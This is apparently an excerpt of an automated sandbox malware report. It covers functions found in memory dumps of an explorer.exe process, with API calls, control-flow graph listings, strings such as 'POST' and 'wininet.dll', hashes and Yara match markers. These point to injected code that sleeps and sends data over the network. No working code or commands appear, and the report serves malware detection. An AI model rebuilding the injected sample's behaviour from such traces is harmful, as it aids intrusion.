                                                                                                                      • Opcode Fuzzy Hash: 072bdcd647c6d36830f8f6c12112151eb3ad9b3d11557e58530cd4f796fef379
                                                                                                                      • Instruction Fuzzy Hash: 5EE0C272200204AFDB20DFA8DC88FEB7B68EF44350F144569FA0CEB282C531E6008B90
                                                                                                                      Function 0296A450 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • NtClose.NTDLL(02964D40,?,?,02964D40,00000000,FFFFFFFF), ref: 0296A475
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, Offset: 02950000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_2950000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Close
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3535843008-0
                                                                                                                      • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                      • Instruction ID: 50590e41779e82fd2c1366b31cc1270279e0ea9770adcebd8d582ec60056cef1
                                                                                                                      • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                      • Instruction Fuzzy Hash: 89D012762002146BD710EBD8DC45EA7779DEF44750F154455BA185B241C570F90086E0
                                                                                                                      Function 04C22CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: dc155e88852f5837d867a7833a9b8b04b1621aaac12f46cef519ec2cfe11f145
                                                                                                                      • Instruction ID: 896d9dd38b12a8d2f8df0e19dae3e1e65955413eaa0a21e2938308ce2afa345b
                                                                                                                      • Opcode Fuzzy Hash: dc155e88852f5837d867a7833a9b8b04b1621aaac12f46cef519ec2cfe11f145
                                                                                                                      • Instruction Fuzzy Hash: 0290027120140402F1007598540864600568BE0706F55D021B5029555EC665D9917131
                                                                                                                      Function 04C22C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 3a65b709398ae689a3f8d502e41b117c4e7fab82455313b8b7df692e772dee9c
                                                                                                                      • Instruction ID: 5f9aefbc82ec95f36fa7f8dfbbeb047e6b7a51e85d17ae41c66951cb6ca45ac0
                                                                                                                      • Opcode Fuzzy Hash: 3a65b709398ae689a3f8d502e41b117c4e7fab82455313b8b7df692e772dee9c
                                                                                                                      • Instruction Fuzzy Hash: 3590027120140842F10071584404B4600568BE0706F55C026B0129654D8615D9517531
                                                                                                                      Function 04C22C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 4e079a85b57cbd1672ce38dc4a33b8b6a4098118dc5b867b09583459f3e54ff7
                                                                                                                      • Instruction ID: 2fb9c67340e05b3103bb923354a579ca28a56829b0365945dd479b77ca7fa5b5
                                                                                                                      • Opcode Fuzzy Hash: 4e079a85b57cbd1672ce38dc4a33b8b6a4098118dc5b867b09583459f3e54ff7
                                                                                                                      • Instruction Fuzzy Hash: A690027120148802F1107158840474A00568BD0706F59C421B4429658D8695D9917131
                                                                                                                      Function 04C22DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 1977da12fe6793dd8585da13b5997d2ad79c4586eeba05338e41219eb0dd9e3b
                                                                                                                      • Instruction ID: a0f80e3959003401eb7aec2bb6f40d2648c03c765fd7e5d2506877fcdcb2c7e0
                                                                                                                      • Opcode Fuzzy Hash: 1977da12fe6793dd8585da13b5997d2ad79c4586eeba05338e41219eb0dd9e3b
                                                                                                                      • Instruction Fuzzy Hash: B3900261242441527545B158440450740579BE0646795C022B1419950C8526E956E631
                                                                                                                      Function 04C22DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: b526420d49c4ad7bbc450ce56b47fa0ec9551b453866ef81381b5520e3b148c3
                                                                                                                      • Instruction ID: b488813549bea6a067784fc41d98d79983e0a576c70e6a32d6843ca4c0a9218a
                                                                                                                      • Opcode Fuzzy Hash: b526420d49c4ad7bbc450ce56b47fa0ec9551b453866ef81381b5520e3b148c3
                                                                                                                      • Instruction Fuzzy Hash: 6E90027120140413F11171584504707005A8BD0646F95C422B0429558D9656DA52B131
                                                                                                                      Function 04C22D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 6fb422f77fe1b07d7cdbb9f7c7ce7a0886c40e6b52fc9fe624e6e6a05359c20d
                                                                                                                      • Instruction ID: 793021dedcb5c9282876f8790727537f20f964cc1f1fb948afd62f5370d5543d
                                                                                                                      • Opcode Fuzzy Hash: 6fb422f77fe1b07d7cdbb9f7c7ce7a0886c40e6b52fc9fe624e6e6a05359c20d
                                                                                                                      • Instruction Fuzzy Hash: 5290026921340002F1807158540860A00568BD1607F95D425B001A558CC915D9696331
                                                                                                                      Function 04C22EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: eeefa5d9b8a1029ee9f41c1ae8dec85fceee76112f41025b42c30c5e5e6026a8
                                                                                                                      • Instruction ID: 529cf1827c85a054d84a3eafbb97df6cc8314552be32e743576fe65782ee05c5
                                                                                                                      • Opcode Fuzzy Hash: eeefa5d9b8a1029ee9f41c1ae8dec85fceee76112f41025b42c30c5e5e6026a8
                                                                                                                      • Instruction Fuzzy Hash: 489002B120140402F1407158440474600568BD0706F55C021B5069554E8659DED57675
                                                                                                                      Function 04C22FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: babe00be8f898bd1acde8f028b82106d1806474ef725e46590fd52a75f35e147
                                                                                                                      • Instruction ID: c2c9070b21da3e21df0536210b907ca179fbe4e34876676b076d43aed0caf181
                                                                                                                      • Opcode Fuzzy Hash: babe00be8f898bd1acde8f028b82106d1806474ef725e46590fd52a75f35e147
                                                                                                                      • Instruction Fuzzy Hash: B7900261211C0042F20075684C14B0700568BD0707F55C125B0159554CC915D9616531
                                                                                                                      Function 04C22F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 5649db3da31f7c16968db1ab49cbe0fbeed937d9fec62f3998cf7aa2ddb31298
                                                                                                                      • Instruction ID: 395e9dc8aa14cec5c4cd82248d9bf66357e1380b691d2e2c95adc8fd47ad85e0
                                                                                                                      • Opcode Fuzzy Hash: 5649db3da31f7c16968db1ab49cbe0fbeed937d9fec62f3998cf7aa2ddb31298
                                                                                                                      • Instruction Fuzzy Hash: F49002A134140442F10071584414B060056CBE1706F55C025F1069554D8619DD527136
                                                                                                                      Function 04C22AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 66f66bd5a32fce97958a5c4cf58538f8634b108535e5e516a7b123a00f37da40
                                                                                                                      • Instruction ID: c2b31d3ca046f5c26df60e6086cc385bc5e4cf02e4349ae6e5aa088a1f920a2c
                                                                                                                      • Opcode Fuzzy Hash: 66f66bd5a32fce97958a5c4cf58538f8634b108535e5e516a7b123a00f37da40
                                                                                                                      • Instruction Fuzzy Hash: 2B900265211400032105B558070450700978BD5756355C031F101A550CD621D9616131
                                                                                                                      Function 04C22BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 056315f1ade2bfd10fb39795e1e03670f78c388cc0e7ffdd4864f268e19224b3
                                                                                                                      • Instruction ID: f2b43eedf3fdba7c6e831011f6c1c9234ea118131e13dc82f41e6f4ee7570ea6
                                                                                                                      • Opcode Fuzzy Hash: 056315f1ade2bfd10fb39795e1e03670f78c388cc0e7ffdd4864f268e19224b3
                                                                                                                      • Instruction Fuzzy Hash: 7690027120544842F14071584404A4600668BD070AF55C021B0069694D9625DE55B671
                                                                                                                      Function 04C22BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: b3d2a5049eb6839c64c97f2a190eb59c8f1504302128a8d62f628b1a720867d3
                                                                                                                      • Instruction ID: 0c14561deaad2e492e8a179939a984ace5f5d7a71d2154125500b0af318f61f9
                                                                                                                      • Opcode Fuzzy Hash: b3d2a5049eb6839c64c97f2a190eb59c8f1504302128a8d62f628b1a720867d3
                                                                                                                      • Instruction Fuzzy Hash: 1190027120140802F1807158440464A00568BD1706F95C025B002A654DCA15DB5977B1
                                                                                                                      Function 04C22B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 79ed0d024903bb0a83e6f847c83aa6c9d3aac56950c211458405d50647cb7132
                                                                                                                      • Instruction ID: 068887229c4c55ea2f2ef18539f5dbcccc909e148627cc809c6c8c3d48da25c5
                                                                                                                      • Opcode Fuzzy Hash: 79ed0d024903bb0a83e6f847c83aa6c9d3aac56950c211458405d50647cb7132
                                                                                                                      • Instruction Fuzzy Hash: E59002A120240003610571584414616405B8BE0606B55C031F1019590DC525D9917135
                                                                                                                      Function 04C235C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: true
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004CDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_4bb0000_explorer.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: e06887f2c363dea132a8a805af35365030bda9f1549ded99757d2b84a5b9b93f
                                                                                                                      • Instruction ID: 8e103ff02c826e39365fa7df72148f4626f416f790ad014e4d6ed31306691c56
                                                                                                                      • Opcode Fuzzy Hash: e06887f2c363dea132a8a805af35365030bda9f1549ded99757d2b84a5b9b93f
                                                                                                                      • Instruction Fuzzy Hash: F090027160550402F1007158451470610568BD0606F65C421B0429568D8795DA5175B2
                                                                                                                      Function 02969039 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 100sleepCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 412 2969039-296903b 413 2969012-2969035 call 296ab90 * 2 412->413 414 296903d-2969082 call 296bd00 412->414 421 296915c-2969162 414->421 422 2969088-29690d8 call 296bdd0 call 295ace0 call 2964e40 414->422 433 29690e0-29690f1 Sleep 422->433 434 2969156-296915a 433->434 435 29690f3-29690f9 433->435 434->421 434->433 436 2969123-2969143 435->436 437 29690fb-2969121 call 2968c60 435->437 438 2969149-296914c 436->438 439 2969144 call 2968e70 436->439 437->438 438->434 439->438
                                                                                                                      APIs
                                                                                                                      • Sleep.KERNELBASE(000007D0), ref: 029690E8
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, Offset: 02950000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_2950000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Sleep
                                                                                                                      • String ID: POST$net.dll$wininet.dll
                                                                                                                      • API String ID: 3472027048-3140911592
                                                                                                                      • Opcode ID: 551f66d44a5d7f168169c0bb73eb4f89d905b09f26124cb34596392b10a6ec33
                                                                                                                      • Instruction ID: 665a11a64a38aba88ce47e33dd47f81462b6c3744907fe44bbd74fddfd0c4010
                                                                                                                      • Opcode Fuzzy Hash: 551f66d44a5d7f168169c0bb73eb4f89d905b09f26124cb34596392b10a6ec33
                                                                                                                      • Instruction Fuzzy Hash: 6B31E0B2504304AFD714EF64C889FBBB7F9EF88704F108159E619AB241D774A510CBA5
                                                                                                                      Function 02969040 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 442 2969040-2969082 call 296bd00 445 296915c-2969162 442->445 446 2969088-29690d8 call 296bdd0 call 295ace0 call 2964e40 442->446 453 29690e0-29690f1 Sleep 446->453 454 2969156-296915a 453->454 455 29690f3-29690f9 453->455 454->445 454->453 456 2969123-2969143 455->456 457 29690fb-2969121 call 2968c60 455->457 458 2969149-296914c 456->458 459 2969144 call 2968e70 456->459 457->458 458->454 459->458
                                                                                                                      APIs
                                                                                                                      • Sleep.KERNELBASE(000007D0), ref: 029690E8
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, Offset: 02950000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_2950000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Sleep
                                                                                                                      • String ID: net.dll$wininet.dll
                                                                                                                      • API String ID: 3472027048-1269752229
                                                                                                                      • Opcode ID: b4243497dee9f50da5ed6b6fc494d7eb823281042cf5996cc4f9cda683b11d1f
                                                                                                                      • Instruction ID: 2abbb124c2b46dfb756548242947e9384b965f25f9acad213b985bbfb5a49f36
                                                                                                                      • Opcode Fuzzy Hash: b4243497dee9f50da5ed6b6fc494d7eb823281042cf5996cc4f9cda683b11d1f
                                                                                                                      • Instruction Fuzzy Hash: 1531A1B2500744BBD724DF64C889F77B7F9BB88B00F10841DF62AAB244DB30A550CBA8
                                                                                                                      Function 0296A630 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 568 296a630-296a661 call 296af20 RtlFreeHeap
                                                                                                                      APIs
                                                                                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02953AF8), ref: 0296A65D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, Offset: 02950000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_2950000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeHeap
                                                                                                                      • String ID: .z`
                                                                                                                      • API String ID: 3298025750-1441809116
                                                                                                                      • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                      • Instruction ID: ca6c44034b91d1748c90520b627248f14defcc393b71aa71cd584a2c5631ef16
                                                                                                                      • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                      • Instruction Fuzzy Hash: C8E046B2200208AFDB18EF99DC48EA777ADEF88750F018558FE086B241C630F910CAF0
                                                                                                                      Function 029582D4 Relevance: 3.1, APIs: 2, Instructions: 59threadwindowCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 571 29582d4-29582d8 572 2958331-2958343 call 295ace0 571->572 573 29582da-29582db 571->573 574 2958347-295835a call 2964e40 572->574 573->574 575 29582dd-29582fd call 296b860 call 296b710 573->575 583 295835c-295836e PostThreadMessageW 574->583 584 295838e-2958392 574->584 585 2958370-295838b call 295a470 PostThreadMessageW 583->585 586 295838d 583->586 585->586 586->584
                                                                                                                      APIs
                                                                                                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0295836A
                                                                                                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0295838B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, Offset: 02950000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_2950000_explorer.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1836367815-0
                                                                                                                      • Opcode ID: d40bfc7a5c7e4afdaa4aedb19b80ea6ab26954b76910d40c4718f2e5288cc79f
                                                                                                                      • Instruction ID: 4094a865df59fa441b243621675c49f767f963b4d2322a836a7137b289c6ad4e
                                                                                                                      • Opcode Fuzzy Hash: d40bfc7a5c7e4afdaa4aedb19b80ea6ab26954b76910d40c4718f2e5288cc79f
                                                                                                                      • Instruction Fuzzy Hash: A4012D3174023977D721E9A45C01FFE7359BB84754F090155FE04EB181E6645D064BE5
                                                                                                                      Function 0295830C Relevance: 3.1, APIs: 2, Instructions: 56threadwindowCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 590 295830c-295831f 591 2958328-295832d 590->591 592 2958323 call 296be20 590->592 593 2958333-295833d 591->593 594 295832e call 296c9c0 591->594 592->591 595 2958343-295835a call 2964e40 593->595 596 295833e call 295ace0 593->596 594->593 600 295835c-295836e PostThreadMessageW 595->600 601 295838e-2958392 595->601 596->595 602 2958370-295838b call 295a470 PostThreadMessageW 600->602 603 295838d 600->603 602->603 603->601
                                                                                                                      APIs
                                                                                                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0295836A
